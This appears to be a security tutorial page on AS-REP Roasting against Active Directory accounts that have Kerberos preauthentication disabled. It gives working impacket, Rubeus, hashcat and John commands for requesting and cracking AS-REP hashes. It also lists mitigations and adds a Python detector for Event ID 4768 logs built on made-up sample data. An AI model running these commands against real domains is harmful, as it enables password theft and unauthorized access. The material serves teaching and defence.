# AS-REP Roasting Attack

### Overview

**AS-REP Roasting** is a Kerberos-based attack in **Active Directory** that targets **user accounts with Kerberos preauthentication disabled**. Normally, Kerberos requires users to prove knowledge of their password *before* the Key Distribution Center (KDC) issues authentication data. If **preauthentication is disabled**, the KDC answers an authentication request from anyone with an **AS-REP**, part of which is **encrypted with a key derived from the user’s password**.

An attacker can:

1. Request AS-REP responses for vulnerable users
2. Extract the encrypted data
3. **Offline crack** it to recover the user’s password (or NT hash)

### Prerequisites

1. The target account must have "**Do not require Kerberos preauthentication**" enabled in AD.
2. The attacker must know (or guess) a valid domain username.
3. The account's password must be weak or otherwise crackable.

### Steps

1. Check which users have **preauthentication** disabled.

   ```bash
   # List which users in users.txt have "Do not require Kerberos preauthentication" set.
   impacket-GetNPUsers toffee.bth/ -dc-ip 10.10.10.100 -usersfile users.txt -no-pass

   # Check if user1 does not require preauthentication.
   impacket-GetNPUsers toffee.bth/user1 -dc-ip 10.10.10.100 -no-pass
   ```
2. Request the AS-REP (TGT) for a user that has **preauthentication** disabled.

   ```bash
   # Linux
   impacket-GetNPUsers toffee.bth/bob -dc-ip 10.10.10.100 -request -no-pass

   # Windows
   .\Rubeus.exe asreproast /nowrap
   ```
3. Crack these hashes.

   ```bash
   hashcat -m 18200 asrep.txt wordlist.txt
   john --wordlist=wordlist.txt asrep.txt
   ```

### Mitigations

1. Enable Kerberos Preauthentication.
2. Use Strong Passwords.
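
On the defensive side, the request in step 2 is recorded on the domain controller as Event ID 4768 with Pre-Authentication Type 0 when Kerberos Authentication Service auditing is enabled. The following is an added example, not part of the original page: it scans 4768 records exported as JSON lines for successful ticket issuance without preauthentication and groups the hits by source address. The JSON layout, the account names, the addresses and the two-account threshold are assumptions made for the example.

```python
import json
from collections import defaultdict

# Constructed sample data: Event ID 4768 records flattened to JSON lines.
# Field names follow the event's EventData; every value is made up.
SAMPLE_EVENTS = """
{"EventID": 4768, "TargetUserName": "alice", "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.21"}
{"EventID": 4768, "TargetUserName": "bob", "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50"}
{"EventID": 4768, "TargetUserName": "svc_backup", "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50"}
{"EventID": 4768, "TargetUserName": "nosuchuser", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.10.10.50"}
{"EventID": 4768, "TargetUserName": "svc_legacy", "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.30"}
"""

ETYPES = {0x11: "AES128", 0x12: "AES256", 0x17: "RC4-HMAC"}


def find_no_preauth_tgts(jsonl):
    """Return successful TGT issuances (4768, Status 0x0) with PreAuthType 0."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue  # not a TGT request, or the KDC refused it
        if str(ev.get("PreAuthType")).strip() != "0":
            continue  # the client proved knowledge of the key first
        etype = int(ev["TicketEncryptionType"], 16)
        hits.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"].replace("::ffff:", ""),
            "etype": ETYPES.get(etype, hex(etype)),
        })
    return hits


def sources_hitting_many(hits, min_accounts=2):
    """Map source address -> accounts, for sources touching several accounts."""
    by_src = defaultdict(set)
    for h in hits:
        by_src[h["source"]].add(h["user"])
    return {s: sorted(u) for s, u in by_src.items() if len(u) >= min_accounts}


if __name__ == "__main__":
    hits = find_no_preauth_tgts(SAMPLE_EVENTS)
    for h in hits:
        print(f"no-preauth TGT: {h['user']} from {h['source']} ({h['etype']})")
    print("multi-account sources:", sources_hitting_many(hits))
```

Every account named in a hit is also a candidate for mitigation 1, because the KDC only issues such a ticket when the account's preauthentication requirement is switched off.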


